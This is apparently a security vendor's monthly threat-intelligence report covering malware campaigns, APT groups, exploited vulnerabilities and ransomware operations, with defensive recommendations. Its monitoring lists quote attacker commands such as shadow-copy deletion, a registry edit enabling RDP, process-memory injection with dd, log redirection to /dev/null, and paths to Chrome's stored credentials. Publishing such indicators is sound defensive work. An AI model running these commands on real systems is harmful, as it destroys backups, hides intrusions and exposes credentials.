Securonix Threat Labs Monthly Intelligence Insights – March 2025
Threat Research
Authors: Nitish Singh, and Nikhil Kumar Chadha
The Monthly Intelligence Insights provides a summary of top threats curated, monitored, and analyzed by Securonix Threat Labs in March 2025. The report additionally provides a synopsis of the threats; indicators of compromise (IoCs); tactics, techniques, and procedures (TTPs); and related tags. Each threat has a comprehensive summary from Threat Labs and search queries from the Threat Research team. For additional information on Threat Labs and related search queries used via Autonomous Threat Sweeper to detect the below-mentioned threats, refer to our Threat Labs home page.
Last month Securonix Autonomous Threat Sweeper identified and analyzed 3,372 TTPs and IoCs, 149 emerging threats, investigated 60 potential threats, and elevated 7 threat incidents. The top data sources swept against include IDS / IPS / UTM / Threat Detection, Data Loss Prevention, Endpoint Management Systems, and Email / Email Security.
Malware: A Growing Threat in the Cybersecurity Landscape
(Originally published in March 2025)
The Autonomous Threat Sweeper team detected a significant increase in malware campaigns in March 2025. A notable example is the OBSCURE#BAT campaign, which employs heavily obfuscated batch scripts and PowerShell commands to deliver the r77 rootkit, while evading detection through API hooking and persistence within the Windows Registry. Additionally, the newly discovered StilachiRAT specifically targets cryptocurrency wallets, bypassing detection using commonly used ports. Meanwhile, XCSSET malware, which targets macOS, has been upgraded with sophisticated evasion techniques aimed at stealing sensitive data. Lastly, CoffeeLoader malware evades detection, deploys additional payloads via SmokeLoader.
| OBSCURE#BAT | The Securonix Threat Research team has discovered the OBSCURE#BAT malware campaign, which leverages heavily obfuscated batch scripts and PowerShell commands to deploy an advanced rootkit called “r77.” The attack chain begins with social engineering tactics, such as fake software updates and CAPTCHA verifications, tricking users into executing malicious scripts. These scripts employ evasion techniques like API hooking, allowing the malware to remain undetected by security tools.
Key aspects of the attack include:
At Securonix, we believe OBSCURE#BAT primarily targets English-speaking users, as its lures, links, and file names are all in English. Additionally, the threat actors’ infrastructure appears to be based in the US. However, researchers have not yet been able to attribute the malware campaign to any specific group or country. |
| StilachiRAT | StilachiRAT, a new remote access Trojan (RAT) tracked by Microsoft, combines a wide range of malicious capabilities to maximize its impact. Discovered in November 2024, it is capable of extensive system reconnaissance, data gathering, credential theft, and cryptocurrency theft. The malware targets cryptocurrency wallets in Google Chrome and can extract passwords and sensitive information. Its stealth features allow it to evade detection by communicating through commonly used ports like 53 and 443, often associated with DNS and HTTPS traffic. StilachiRAT also includes mechanisms for persistence, operating as either a Windows service or standalone component, with self-protection features. |
| New XCSSET Malware | XCSSET, a malicious infostealer targeting macOS, has been updated with enhanced obfuscation, persistence mechanisms, and infection strategies, according to a warning from Microsoft. The malware, previously seen in attacks against Apple developers, can steal data from applications like Safari, Skype, Telegram, WeChat, and Notes, take screenshots, exfiltrate files, and encrypt data. The new variant introduces more sophisticated evasion techniques, such as randomized payload generation and a mix of encoding methods like Base64. XCSSET continues to target digital wallets and exfiltrate sensitive information. The update marks the first known change to the malware since 2022 and increases its potential for supply chain attacks, with its reach expected to expand. |
| CoffeeLoader Malware | CoffeeLoader, a new sophisticated malware loader identified in September 2024, is designed to deploy second-stage payloads while evading detection using techniques such as GPU-based code execution via the “Armoury” packer, call stack spoofing, sleep obfuscation, and Windows fibers. It employs a Domain Generation Algorithm (DGA) for command-and-control fallback and certificate pinning to secure communications. CoffeeLoader has been observed deploying Rhadamanthys shellcode and shares several similarities with SmokeLoader, including stager-based module injection, bot ID generation, mutex name creation, import resolution by hash, RC4 encryption for network traffic, and use of low-level Windows APIs. The relationship between the two malware families remains unclear. The Armoury packer hijacks legitimate Armoury Crate exports and uses the OpenCL library to decrypt shellcode on the GPU. CoffeeLoader’s dropper installs the packed DLL and establishes persistence through the Windows Task Scheduler, while also setting file attributes to prevent deletion or modification. The loader’s stager creates a suspended dllhost.exe process to inject the main module, which resolves API function addresses using the DJB2 algorithm and incorporates additional anti-detection techniques. |
Threat Labs summary
Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against these malicious campaigns.
- Remain vigilant against social engineering, malvertising, and fake CAPTCHA scams that deceive users into running malicious code. Remember, legitimate CAPTCHA services will never copy code to your clipboard or prompt execution. Exercise caution when handling batch (.bat) files from unknown sources, as they are frequently used in phishing attacks.
- Organizations are advised to implement security-hardening measures to prevent initial compromise, such as:
- Enabling Safe Links and Safe Attachments in Microsoft 365.
- Using endpoint detection and response (EDR) in block mode.
- Activating Microsoft Defender protections against potentially unwanted applications (PUAs).
- Developers should verify Xcode projects before use and only install applications from trusted sources.
- Organizations should prioritize enhanced endpoint detection and response (EDR) solutions with advanced behavioral analysis capabilities that can detect and block suspicious activity patterns associated with process injection, call stack manipulation, and memory obfuscation techniques, even when combined with GPU-based code execution.
- 190 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.
TTPs related to the OBSCURE#BAT campaign include but are not limited to the following:
- Monitor for any suspicious activity where files, processes, or registry keys matching the “$nya-” prefix are hidden, as this could indicate an infection on the system.
- Monitor for the registration of a fake driver, such as “ACPIx86.sys,” which could indicate an attempt to gain deeper system access.
- Monitor for suspicious PowerShell commands querying disk drive information, such as those using the “Get-WmiObject” cmdlet, as they may signal malicious activity.
TTPs related to the StilachiRAT campaign include but are not limited to the following:
- Monitor for process injections and suspicious service installations, particularly those logged under Event ID 7045, which indicates that a new service has been installed on the system.
- Monitor for any attempts to access or decrypt Google Chrome stored credentials from the following locations:
- %LOCALAPPDATA%\Google\Chrome\User Data\Local State
- %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
TTPs related to the XCSSET campaign include but are not limited to the following:
- Monitor for unauthorized modifications to .pbxproj files in Xcode projects.
- Monitor for execution of shell commands such as curl, xxd, Base64 decoding, or obfuscated scripts being piped to sh.
- Monitor for unexpected osascript executions or AppleScript payloads running in the background.
- Monitor for modifications to ~/.zshrc and ~/.zshrc_aliases to ensure malware runs on new shell sessions.
- Monitor for unauthorized use of dockutil to replace legitimate Launchpad shortcuts with malicious payloads.
TTPs related to the CoffeeLoader campaign include but are not limited to the following:
- Monitor for the creation of dllhost.exe processes in a suspended state, especially if followed by code injection activity. Also, watch for rundll32.exe being launched with unusual or unexpected DLLs, particularly those located in temporary directories.
- Monitor for processes attempting to modify ACLs (using SetEntriesInAclW or similar APIs) to deny users DELETE, WRITE_DATA, WRITE_EA, or WRITE_ATTRIBUTES permissions on files.
- Monitor for the creation of scheduled tasks with names like “AsusUpdateServiceUA” or similar, especially if they are configured to run frequently (e.g., every 10 or 30 minutes) or on user logon.
- Monitor for processes that are frequently changing the memory region permissions of their own code or that of other processes (e.g., toggling between PAGE_READWRITE and PAGE_EXECUTE_READ).
- Monitor for processes that encrypt large portions of their memory while in a sleep state, then decrypt them upon waking. This may involve the use of Windows API calls like SystemFunction032 (RC4 encryption) or other custom encryption routines.
- Monitor for the processes that are attempting to bypass Control Flow Guard (CFG) by adding exceptions for specific functions like NtContinue, NtSetContextThread, or SystemFunction032 using NtSetInformationVirtualMemory with the VmCfgCallTargetInformation class.
Tags: Malware: OBSCURE#BAT, StilachiRAT, XCSSET, CoffeeLoader | Target: English Speaking Users
Threat Actors Activity Overview
(Originally published in March 2025)
In March 2025, UNC3886 and MirrorFace have increased cyberattacks. UNC3886 targets outdated Juniper routers, while MirrorFace uses advanced techniques and targets diplomatic organizations.
Firstly, the China-nexus cyber espionage group UNC3886 has shifted its tactics and is now targeting end-of-life Juniper Networks MX Series routers. The group deploys custom backdoors with active and passive functions, including an embedded script that disables logging mechanisms to enable stealthy long-term persistence. Previously, UNC3886 exploited zero-day vulnerabilities in Fortinet, Ivanti, and VMware devices to gain remote access. Mandiant discovered these backdoors in mid-2024 and collaborated with Juniper Networks to investigate. The affected devices were running outdated hardware and software. UNC3886’s operations aim to maintain long-term access to victim networks, primarily targeting organizations in the defense, technology, and telecommunications sectors in the US and Asia.
Second, the China-aligned APT group MirrorFace, active since 2019, has primarily targeted Japanese-affiliated sectors. In 2024, the group expanded its operations, employing Visual Studio Code’s remote tunnels and side-loading malware via McAfee and JustSystems applications. Between June and September 2024, MirrorFace used Expo 2025 as a lure in spearphishing attacks, deploying ANEL via PowerShell-based infection chains.
In August 2024, MirrorFace expanded its cyber-espionage activities beyond Japan, targeting a Central European diplomatic entity in Operation AkaiRyū. The group used sophisticated tactics, including a customized AsyncRAT, the resurgence of the ANEL backdoor, and stealthy execution chains. To evade detection, MirrorFace deleted logs, erased malware traces, and leveraged Windows Sandbox, highlighting its growing operational security and the increasing cyber threat landscape.
Threat Labs summary
Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against these threat actors.
- Organizations should upgrade their Juniper devices to the latest firmware versions, which include mitigations and updated JMRT signatures, and perform a JMRT Quick Scan and Integrity Check post-upgrade.
- Enforce strict access controls, network segmentation, and other security measures on network devices, administrative systems, and those used for network management.
- Enable advanced email filtering to block spearphishing, train employees to identify phishing attempts and avoid malicious links or attachments, and implement email authentication protocols like DMARC, DKIM, and SPF to prevent email spoofing.
- Implement multi-factor authentication (MFA) to protect against stolen credentials, apply the principle of least privilege (PoLP) to limit user access, and monitor and restrict the use of remote tools like Visual Studio Code remote tunnels.
- 40 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.
TTPs related to the UNC3886 campaign include but are not limited to the following:
- Monitor for the presence of TINYSHELL-based backdoors disguised as legitimate Junos OS processes (appid, to, irad, lmpad, jdosd, oemd).
- Monitor for the execution of Base64-encoded files (ldb.b64) and unexpected archive extraction (tar, gunzip).
- Monitor for the creation of unusual named pipes (mkfifo null; cat null &) used to execute payloads.
- Monitor for the memory Injection Attacks, where malware is injected into legitimate processes (cat, snmpd, mgd) using: dd if=<malware> of=/proc/<pid>/mem conv=notrunc.
- Monitor for unexpected outbound connections from Juniper routers to hardcoded command-and-control (C2) servers over port 22, 31234, or 33512.
- Monitor for the unusual ICMP traffic with embedded commands, using a specific magic string (uSarguuS62bKRA0J).
- Monitor for the disabled logging mechanisms, particularly modifications to:
- /var/log/messages, /var/log/auth, /var/log/interactive-commands
- /mfs/var/etc/syslog.conf being altered to redirect logs to /dev/null.
Tags: Threat Actor: MirrorFace (Earth Kasha), APT10 subgroup, UNC3886 | Target Region: Central Europe, Japan | Industry Targeted: Diplomacy, Government, Research, Media, Finance, Defense | Attack Vector: Spearphishing, Social Engineering, Malicious Attachments, OneDrive Links | Malware Used: ANEL (UPPERCUT), AsyncRAT, HiddenFace, FaceXInjector | Tools Abused: Visual Studio Code, Windows Sandbox, McAfee Executables, JustSystems Applications | Lure Used: Expo 2025 (Osaka, Japan)
Emerging Vulnerabilities
(Originally published in March 2025)
In March 2025, state-sponsored APT groups and cybercriminals exploited the ZDI-CAN-25373 vulnerability in Windows LNK files, targeting key sectors globally. Additionally, the “SuperBlack” ransomware campaign, linked to Mora_001, exploited Fortinet vulnerabilities to deploy ransomware.
Firstly, a recently discovered zero-day vulnerability (ZDI-CAN-25373) in Windows shortcut (LNK) files is being actively exploited by state-sponsored APT groups from North Korea, Iran, Russia, and China for espionage and financial gain. This vulnerability allows attackers to remotely execute arbitrary code when a victim opens or views a malicious shortcut. The exploitation occurs through spear-phishing emails, malicious archives, or USB-based attacks, delivering payloads like RATs or keyloggers. Targeted campaigns have been observed against government agencies, financial institutions, telecommunications, military, and energy sectors worldwide, with nearly 1,000 weaponized LNK samples identified.
Second, the newly discovered “SuperBlack” ransomware campaign, orchestrated by the threat actor “Mora_001,” targets unpatched FortiOS devices by exploiting two Fortinet vulnerabilities (CVE-2024-55591 and CVE-2025-24472). Linked to the LockBit ecosystem, the attackers gain unauthorized access, deploy ransomware to encrypt critical files, and demand cryptocurrency for decryption keys. The campaign impacts sectors such as finance, healthcare, and government.
Threat Labs summary
Securonix Threat Labs recommends leveraging our findings to deploy protective measures for increased threats from these vulnerabilities.
- Block execution of .lnk files from untrusted sources.
- Disable unnecessary Windows scripting tools (e.g., PowerShell, cmd) for non-administrative users.
- Apply security updates for CVE-2024-55591 and CVE-2025-24472 on all Fortinet devices.
- Monitor FortiGate dashboards for unusual access patterns.
- Enforce multi-factor authentication (MFA) for all VPN and administrative accounts.
- 857 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.
TTPs related to the Mora_001 include but are not limited to the following:
- Monitor HTTP/S connections to external firewall IPs for the presence of “local_access_token” in the URL.
- Monitor for profile with string super_admin in “Admin login successful” logs or with [super_admin->super_admin]password[*] or [super_admin]vdom[root]password[*]
- Monitor for newly added local users on the firewall by reviewing logs with “Object attribute configured” and messages like “Add system.admin <user_name>”
- Monitor for new users added to VPN groups by checking logs with “Object attribute configured” and messages like “Edit user.group VPN Users” or “Add user.localxxx1”
- Monitor GUI access from external IPs by looking for logs with “cfgpath”: “system.admin” combined with “ui”: “GUI(<ip address>)”
TTPs related to the ZDI-CAN-25373 include but are not limited to the following:
- Monitor for a .lnk file launching cmd.exe or powershell.exe is the primary red flag. Look for cmd.exe or powershell.exe executions with heavily obfuscated command-line arguments. This could include base64 encoding, character substitution, or other techniques to hide the intent of the command.
- Monitor for suspicious icons and filenames: LNK files disguised with icons of common file types (e.g., PDFs, Word documents) and with deceptive filenames (e.g., document.pdf.lnk).
Tags: Campaign: SuperBlack Ransomware | Vulnerability: ZDI-CAN-25373, CVE-2024-55591 and CVE-2025-24472 | Threat Actor: Mora_001 | Target Sector: Critical Infrastructure, Enterprises, Government, financial, telecommunications, military, energy, private sector | Target Countries: North America, Europe, Asia, South America, and Australia.
Surge in Ransomware & RaaS Threats
(Originally published in March 2025)
In February 2025, Winnti Group targeted Japanese industries via the RevivalStone campaign, exploiting SQL injection vulnerabilities. Kimsuky used spear-phishing with LNK files to deploy PebbleDash backdoor and an RDP Wrapper. Both groups focused on data theft and persistence, posing significant threats to critical sectors.
Winnti Group – The China-based APT group known as Winnti, also referred to as APT41, has launched a cyber campaign called RevivalStone, first identified in 2024. This campaign specifically targets Japanese organizations in key sectors, including manufacturing, materials, and energy. RevivalStone employs an upgraded version of the Winnti malware, featuring enhanced capabilities. The attack begins with SQL injection exploits in web-facing ERP systems, allowing the deployment of web shells such as China Chopper, Behinder, and sqlmap file uploader to gain initial access. These web shells enable reconnaissance, credential harvesting, and lateral movement within the compromised networks. Winnti is known for targeting intellectual property and sensitive data across various industries, including gaming, pharmaceuticals, aerospace, and, more recently, Japan’s critical infrastructure.
Kimsuky Group – A North Korean state-sponsored threat actor active since 2013, has been targeting organizations across the United States, Japan, Russia, Vietnam, and multiple European nations. Recently, the group has intensified its use of spear-phishing tactics, delivering malware through LNK files disguised as legitimate documents. When executed, these files trigger PowerShell or Mshta commands, which download and install the PebbleDash backdoor along with a custom-built RDP Wrapper, enabling remote system control. Kimsuky also employs proxy malware to facilitate communication between infected systems and external networks. These proxies allow the group to bypass network restrictions and maintain persistence within compromised environments.
Threat Labs summary
Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against these threat activities.
- Regularly updating ERP software, web applications, and databases, implementing strict input validation with parameterized queries, and restricting database user permissions are essential measures to prevent SQL injection attacks and minimize potential damage.
- Regularly scanning for unauthorized file modifications, disabling unnecessary scripting features on public-facing servers, and restricting access to web administration panels with multi-factor authentication (MFA) are crucial steps to prevent web shell deployments and unauthorized access.
- Deploying advanced email security solutions to detect malicious LNK, PowerShell, and Mshta-based payloads, utilizing sandboxing to analyze attachments before delivery, and blocking LNK files from untrusted sources are crucial measures to prevent spear-phishing attacks.
- Configuring Group Policy to block LNK execution from email attachments and restricting Mshta.exe and PowerShell execution for untrusted scripts are essential steps to prevent malware deployment and execution.
- 12 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.
TTPs related to the Winnti group include but are not limited to the following:
- Monitor for a modified DLL file: TSMSISrv.dll (DLL hijacking).
- Monitor for execution of file mresgui.dll, which is the Winnti Loader.
- Monitor for the DAT file which loads Winnti RAT.
- Monitor for the Winnti Rootkit Installer: amonitor.sys (“%SystemRoot%\System32\drivers\”).
- Monitor for the obfuscation using XOR or ChaCha20.
TTPs related to the Kimsuky group include but are not limited to the following:
- Monitor for the shortcut files with document-like icons (.LNK) initiating malicious commands using PowerShell or Mshta.
- Monitor for a self-developed RDP Wrapper which is used to enable remote access on non-RDP-supported systems.
- Monitor for the creation of mutexes like “MYLPROJECT” or “LPROXYMUTEX.” [“C:\Programdata\USOShared2\version.ini”] (Proxy Tools).
- Monitor for keyloggers store keystroke data in files: joeLog.txt and jLog.txt (“C:\Programdata\joeLog.txt” and “C:\Programdata\jLog.txt”).
- Monitor for file: wbemback.dat which is loading into memory for stealthy execution (“%SystemDirectory%\wbemback.dat”).
- Monitor for file: “Invoke-ReflectivePEInjection.ps1” for stealthy PowerShell-based payload execution (“%ALLUSERSPROFILE%\USOShared\Prosd\”).
Tags: APT Group: Winnti, Kimsuky| Target Sector: Gaming, Pharmaceuticals, Aerospace, and Critical Infrastructure | Target Regions: The United States, Japan, Russia, Vietnam, and European nations. | Malware: Pebble Bash, RDP Wrapper
Ransomware Trends & Threat Analysis
(Originally published in February 2025)
In March 2025, notable ransomware threats emerged, including VanHelsing Ransomware, which targets Windows, Linux, and VMware ESXi systems, utilizing a double extortion tactic with sophisticated encryption and exfiltration methods. The PlayBoy Locker RaaS group continues to gain traction, leveraging a Ransomware-as-a-Service (RaaS) model. Medusa Ransomware has also become a key threat, with a focus on critical infrastructure. Meanwhile, the Black Basta RaaS Group remains active, targeting multiple industries with its advanced ransomware techniques. These groups reflect the evolving ransomware landscape, with complex extortion strategies and widespread impact.
| VanHelsing Ransomware | A newly emerged ransomware strain, operating under the RaaS model, has quickly captured attention due to its widespread targeting of both Windows and non-Windows systems, including Linux, BSD, ARM, and VMware ESXi, primarily in the U.S. and France. The group uses a double extortion approach, encrypting files with [.]vanhelsing and [.]vanlocker extensions while also exfiltrating sensitive data. With advanced evasion techniques and persistence mechanisms, detection and removal are challenging.
Affiliates pay $5,000 to join, with experienced cybercriminals able to join for free. The ransom revenue is split, with 20% going to the operator and 80% to the affiliates. The ransomware employs sophisticated encryption methods like Curve25519, AES, Salsa20/ChaCha, and XOR encoding for obfuscation. Communication with the group’s infrastructure is facilitated through onion links for ransom negotiation and data exfiltration. Within just two weeks, the RaaS group has already infected three victims, demanding $500,000 in Bitcoin for file decryption and data removal, while avoiding countries in the Commonwealth of Independent States (CIS). |
| PlayBoy Locker RaaS | A newly emerged Ransomware-as-a-Service platform which provides unskilled cybercriminals with a comprehensive toolkit including ransomware payloads, management dashboards, and dedicated support services to conduct ransomware attacks. It has been active since 2024 and primarily targets Windows, NAS (Network-Attached Storage), and ESXi environments. The group employs HC-128 and Curve25519 encryption algorithms to effectively encrypt files across all connected devices within the network. The PlayBoy Locker affiliates operate on a revenue-sharing model in which affiliates keep 85% while operators retain only 15% of the ransom payments. Moreover, the ransomware is capable of encrypting a wide range of file formats including documents, multimedia, and database files across all compromised networks. |
| Medusa Ransomware | A joint advisory was released in March 2025 by CISA, the FBI, and MS-ISAC regarding Medusa ransomware, a RaaS group that has been active since 2021. The developers and affiliates have already impacted 300 victims in multiple sectors including healthcare, education, legal, insurance, technology, and manufacturing. The group employs a double extortion model and advanced techniques to evade detection, disable endpoint detection systems, and leveraging reverse tunneling tools like Ligolo and Cloudflared. Medusa ransomware infiltrates victims’ networks primarily through phishing campaigns and by exploiting unpatched vulnerabilities like the ScreenConnect flaw (CVE-2024-1709) and the Fortinet EMS SQL injection vulnerability (CVE-2023-48788). They deploy legitimate administration tools like Advanced IP Scanner and SoftPerfect Network Scanner to map out users, systems, and networks. Additionally, they use various remote access software such as AnyDesk, Atera, ConnectWise, and Splashtop to maintain access. |
| Black Basta RaaS Group | On February 11, internal chat logs of Black Basta RaaS members were leaked by Russian user @ExploitWhispers. Black Basta, a prominent RaaS group that emerged in 2022 targets Industrial Machinery and Manufacturing sectors by exploiting supply chain vulnerabilities. The chat logs provide significant insights of the group’s operations, key member roles, infrastructure and the existence of an advanced brute-forcing framework dubbed BRUTED. This tool has been active since 2023 that automates large scale internet scanning and credential stuffing attacks against network edge devices including corporate firewall and VPN solutions.
Black Basta affiliates leverage BRUTED to establish an initial foothold in the corporate networks, facilitating lateral movement and deployment of ransomware. |
Threat Labs summary
Securonix Threat Labs recommends leveraging our findings to deploy protective measures for increased threats from these ransomware campaigns.
- Configure encryption, authentication, and access controls for critical systems in both cloud and local environments.
- Retain multiple secure copies of sensitive data and systems in separate locations, including physical devices or the cloud.
- Require MFA for all services, especially for webmail, VPNs, and accounts accessing critical systems.
- Ensure timely updates of operating systems, software, and firmware, prioritizing patches for known vulnerabilities, particularly in internet-facing systems.
- Use network segmentation to control traffic and limit lateral movement, reducing ransomware spread.
- Block unknown or untrusted sources from accessing remote services on internal systems, preventing adversary persistence.
- Review domain controllers, servers, and active directories for unauthorized or unfamiliar accounts.
- Restrict command-line tools and permissions to hinder privilege escalation and lateral movement by threat actors.
- Ensure backup data is encrypted, immutable, and covers the full range of your data infrastructure to prevent tampering.
- 31 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.
TTPs related to the ValHensing Ransomware include but are not limited to the following:
-
- Monitor for Encrypted extension [.]vanhelsing and [.]vanlocker
- Monitor for the unusual filename locker.exe appearing in C:\Users\ADMINI~1\AppData\Local\Temp\2\
- Monitor for Curve25519, AES, and Salsa20/ChaCha encryption. (The ransomware will begin encrypting files using a combination of encryption algorithms like Curve25519, AES, Salsa20, or ChaCha. It also uses XOR encoding for further obfuscation of the encrypted data.)
- Monitor for directories –
- C:\Users\ADMINI~1\AppData\Local\Temp\2\74edcda8581f9636c83352ad946821b0\1-locker\Release\1-locker.pdb
- C:\Users\ADMINI~1\AppData\Local\Temp\2\cd9563b4cbc415b3920633b93c0d351b\1-locker\Release\1-locker.pdb
- Monitor for Mutex – Global\VanHelsing
TTPs related to the PlayBoy LockerRansomware include but are not limited to the following:
- Monitor for network scans using LDAP to enumerate machines, especially with credentials provided in the command. Look for command-line usage of LDAP utilities with unusual parameters (-ip, -u, -p).
- Monitor for loading of RstrtMgr.dll by non-system processes, immediately followed by attempts to kill processes related to security software, databases, or backups.
- Monitor for execution of vssadmin delete shadows /all /quiet. (Shadow Copy Deletion)
- Monitor for the creation of files named INSTRUCTIONS.txt containing ransom demands, appearing in multiple directories.
- Monitor for execution of command for self-deletion C:\Windows\System32\cmd.exe /C ping 127.0.0.1 -n 2 >nul del /F file name after other suspicious activities.
TTPs related to the Medusa Ransomware Group include but are not limited to the following:
- Monitor for Monitor for [.]medusa file extensions that are used for encryption.
- Monitor for gaze.exe file, which terminates all the services, including backups, security, databases, communication, file sharing.
- Monitor for Rclone tool: rclone.exe installation for data exfiltration to suspicious locations.
- Monitor for certutil.exe, which is used to avoid detection.
- Monitor for registry modifications to enabling Remote Desktop connections: (modifying fDenyTSConnections) reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /vfDenyTSConnections /t REG_DWORD /d 0 /f
- Monitor for PowerShell commands using the -nop, -w hidden, -noni, -ep bypass flags.
- Monitor for execution of vssadmin delete shadows /all /quiet. (Shadow Copy Deletion)
- Monitor for the creation of ransom notes (!!!READ_ME_MEDUSA!!!.txt) in multiple directories.
Tags: Ransomware Group: Medusa, Black Basta, Vanhelsing | Target: Windows Systems, Linux, BSD, ARM, VMware ESXi, NAS | Target Sector: Healthcare, Education, Legal, Insurance, Technology, Manufacturing, and Industrial Machinery
For a full list of the search queries used on Autonomous Threat Sweeper for the threats detailed above, refer to our Threat Labs home page. The page also references a list of relevant policies used by threat actors.
We would like to hear from you. Please reach out to us at [email protected].
Note: The TTPs when used in silo are prone to false positives and noise and should ideally be combined with other indicators mentioned.
Contributors: Dheeraj Kumar, and Sina Chehreghani
